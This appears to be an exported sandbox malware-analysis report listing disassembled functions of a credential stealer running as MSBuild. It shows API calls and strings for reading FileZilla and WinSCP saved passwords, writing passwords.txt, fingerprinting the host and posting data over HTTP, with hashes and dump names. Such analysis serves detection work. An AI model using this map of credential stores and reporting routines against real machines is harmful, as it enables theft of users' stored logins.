Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 4146028692-935134978
Opcode ID: 615d63f7bf2d45f6f47d8fedcf3be5491d61456915c6e85213d9bd40bf3d1580
Instruction ID: 14048a2b419fde31a88832429adc402d622cfb8f20e2d9bcd7eb6ceae992149e
Opcode Fuzzy Hash: 615d63f7bf2d45f6f47d8fedcf3be5491d61456915c6e85213d9bd40bf3d1580
Instruction Fuzzy Hash: E5A18572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99

Function 00406BB5 Relevance: 63.6, APIs: 20, Strings: 16, Instructions: 598
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
StrCmpCA.SHLWAPI(?), ref: 00406C72
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
lstrlenA.KERNEL32(?,",status,00437998,------,0043798C,",task_id,00437978,------,0043796C,",mode,00437958,------,0043794C), ref: 0040753C
lstrlenA.KERNEL32(?), ref: 0040754B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
HeapAlloc.KERNEL32(00000000), ref: 0040755D
lstrlenA.KERNEL32(?), ref: 0040756A
_memmove.LIBCMT ref: 00407578
lstrlenA.KERNEL32(?), ref: 00407586
lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
_memmove.LIBCMT ref: 004075A1
lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
InternetCloseHandle.WININET(00000000), ref: 0040762C
InternetCloseHandle.WININET(?), ref: 00407638
InternetCloseHandle.WININET(?), ref: 00407644
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

task_id, xrefs: 00407351
", xrefs: 004074DD
b99f23e6ab2693b305f8810abd671d18, xrefs: 004070ED
------, xrefs: 004073FF
mode, xrefs: 004071F1
build_id, xrefs: 00407095
status, xrefs: 004074B1
------, xrefs: 00406FE3
", xrefs: 0040737D
", xrefs: 004070C1
------, xrefs: 00407145
", xrefs: 0040721D
------, xrefs: 00406E82
------, xrefs: 0040729F
", xrefs: 00406F61
------, xrefs: 00406CFC

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$"$"$------$------$------$------$------$------$b99f23e6ab2693b305f8810abd671d18$build_id$mode$status$task_id
API String ID: 3702379033-1878225474
Opcode ID: c793aeecd545ee641a2a8adfff4ed13e874b461d4c663d960c75efdd339cb0f9
Instruction ID: 42b782e3d86a9350796fa24ab104a47fbd96201bae2466775e008d32658e9246
Opcode Fuzzy Hash: c793aeecd545ee641a2a8adfff4ed13e874b461d4c663d960c75efdd339cb0f9
Instruction Fuzzy Hash: 5052897194016D9ACF61EB62CD46BCCB3B5AF04308F4184E7A51D73161DA746FCA8FA8

Function 0040E186 Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040E1B7
_memset.LIBCMT ref: 0040E1D7
_memset.LIBCMT ref: 0040E1E8
_memset.LIBCMT ref: 0040E1F9
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E276
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E29D
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9

Strings

Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E20B
Login: , xrefs: 0040E459
Soft: WinSCP, xrefs: 0040E2FE
HostName, xrefs: 0040E367
PortNumber, xrefs: 0040E3BD
Host: , xrefs: 0040E32A
:22, xrefs: 0040E42D
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E2B3
Security, xrefs: 0040E253
UserName, xrefs: 0040E496
Password, xrefs: 0040E515
passwords.txt, xrefs: 0040E662
UseMasterPassword, xrefs: 0040E24E
Password: , xrefs: 0040E529

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memset$Value$CloseOpen$Enum
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 463713726-2798830873
Opcode ID: 4eaab8354fff006c774e5a3a11a8fc4062ced311967a4d7608afb3132e7bbd75
Instruction ID: ab712d79911a6534e16ca2c8d51643d97c9570b95301d2e418567ee179d90524
Opcode Fuzzy Hash: 4eaab8354fff006c774e5a3a11a8fc4062ced311967a4d7608afb3132e7bbd75
Instruction Fuzzy Hash: 56D1D6B195012DAADF21EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5

Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
StrCmpCA.SHLWAPI(?), ref: 00405FF6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,b99f23e6ab2693b305f8810abd671d18,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
lstrlenA.KERNEL32(?), ref: 0040660C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
HeapAlloc.KERNEL32(00000000), ref: 0040661E
lstrlenA.KERNEL32(?), ref: 0040662B
_memmove.LIBCMT ref: 00406639
lstrlenA.KERNEL32(?), ref: 00406647
lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
_memmove.LIBCMT ref: 00406662
lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
InternetCloseHandle.WININET(00000000), ref: 004066ED
InternetCloseHandle.WININET(?), ref: 004066F9
InternetCloseHandle.WININET(?), ref: 00406705
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

------, xrefs: 00406080
", xrefs: 00406445
mode, xrefs: 00406575
", xrefs: 004062E5
build_id, xrefs: 00406419
b99f23e6ab2693b305f8810abd671d18, xrefs: 00406471
------, xrefs: 00406206
", xrefs: 004065A1
------, xrefs: 004064C9
------, xrefs: 00406367

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$------$------$------$------$b99f23e6ab2693b305f8810abd671d18$build_id$mode
API String ID: 3702379033-92851515
Opcode ID: 9130669875251964c831f1a88f491c766dae42b48f3d6367ba80e634a4db9760
Instruction ID: 761880eafc7f1130453e9609930188909abd0ac3e1dc834df3bf91bb01064538
Opcode Fuzzy Hash: 9130669875251964c831f1a88f491c766dae42b48f3d6367ba80e634a4db9760
Instruction Fuzzy Hash: 9E22C9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8

Function 00418753 Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00418794
GetProcAddress.KERNEL32 ref: 004187AB
GetProcAddress.KERNEL32 ref: 004187C2
GetProcAddress.KERNEL32 ref: 004187D9
GetProcAddress.KERNEL32 ref: 004187F0
GetProcAddress.KERNEL32 ref: 00418807
GetProcAddress.KERNEL32 ref: 0041881E
GetProcAddress.KERNEL32 ref: 00418835
GetProcAddress.KERNEL32 ref: 0041884C
GetProcAddress.KERNEL32 ref: 00418863
GetProcAddress.KERNEL32 ref: 0041887A
GetProcAddress.KERNEL32 ref: 00418891
GetProcAddress.KERNEL32 ref: 004188A8
GetProcAddress.KERNEL32 ref: 004188BF
GetProcAddress.KERNEL32 ref: 004188D6
GetProcAddress.KERNEL32 ref: 004188ED
GetProcAddress.KERNEL32 ref: 00418904
GetProcAddress.KERNEL32 ref: 0041891B
GetProcAddress.KERNEL32 ref: 00418932
GetProcAddress.KERNEL32 ref: 00418949
LoadLibraryA.KERNEL32(?,004185D2), ref: 0041895A
LoadLibraryA.KERNEL32(?,004185D2), ref: 0041896B
LoadLibraryA.KERNEL32(?,004185D2), ref: 0041897C
LoadLibraryA.KERNEL32(?,004185D2), ref: 0041898D
LoadLibraryA.KERNEL32(?,004185D2), ref: 0041899E
GetProcAddress.KERNEL32(75A70000,004185D2), ref: 004189BA
GetProcAddress.KERNEL32(75290000,004185D2), ref: 004189D5
GetProcAddress.KERNEL32 ref: 004189EC
GetProcAddress.KERNEL32(75BD0000,004185D2), ref: 00418A07
GetProcAddress.KERNEL32(75450000,004185D2), ref: 00418A22
GetProcAddress.KERNEL32(76E90000,004185D2), ref: 00418A3D
GetProcAddress.KERNEL32 ref: 00418A54

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 98b88b5f96dc66c065c06141136ba5df242bfcb15761572c331c610d89b40f79
Instruction ID: 199c42d56f0628ccab12840d69b6f02f13cfb0cf7a8249375453f6caf445ef8e
Opcode Fuzzy Hash: 98b88b5f96dc66c065c06141136ba5df242bfcb15761572c331c610d89b40f79
Instruction Fuzzy Hash: 2B7106B5910312AFEF1ADF60FD488243BA7F70874BF11A426E91582270EB374A64EF55

Function 00413B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16

Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
Part of subcall function 004115D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71

GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB

Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E

Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B

Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
Part of subcall function 00411807: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
Part of subcall function 00411997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB

Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF

Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D

Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
Part of subcall function 00410F51: RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF

Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB

Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC

Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A

Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9

Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D

Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347

